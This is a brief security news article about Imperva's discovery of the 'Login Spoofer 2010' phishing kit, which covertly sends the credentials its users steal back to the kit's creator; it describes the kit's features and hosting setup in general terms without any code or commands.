Security researchers from data protection solutions vendor Imperva have uncovered a new phishing kit, which secretly sends the data stolen by phishers who use it, back to its creator. The tool is able to create phishing pages for many popular online services and uses a distributed infrastructure.

Called “Login Spoofer 2010” the program was apparently created by a hacker calling himself hol4ko, who advertises it on hacking forums and news groups. According to Imperva, the malware writer boasts over 200,000 downloads for his phishing kit, which if true, makes it quite successful.

It seems that even though the kit's interface is in English, it was coded in Algeria, possibly pointing to the nationality of its author. It also comes with instructions in Arabic and is able to create fake websites mimicking the login pages of multiple services such as PayPal, Hotmail, Gmail, Yahoo!, MSN, Facebook, MySpace, Skype, CamFrog, Skyrock, Maktoob, Gamezer, Travian, RapidShare, 4Shared and MegaUpload.

There is also an option to select the generated phishing page's extension from PHP and HTML and to encrypt the file containing the stolen credentials. There's also a dashboard view, which allows phishers to view the captured data ordered in blocks of fields displaying username, password, type of account and IP address.

“[…] This attack highlights that there’s no honor among thieves. […] The irony is that anyone using this kit becomes an unknowing member of the master hacker’s army. When hackers use this kit and deploy a successful phishing campaign, all the stolen credentials and information goes straight back to the master hacker without the proxy hacker’s knowledge. It’s very clever. The master hacker never needs to conduct a campaign to see financial gain,” the Imperva security researchers explain.

It is also noted that while most traditional phishing schemes store the fake pages and collected data on the same server, this kit takes what Imperva calls “new cloud-based approach” to infrastructure. With the back-end part being hosted separately, the hackers only need to change the location of their front-end phishing pages in case the servers used to host them are taken down.

You can follow the editor on Twitter @lconstantin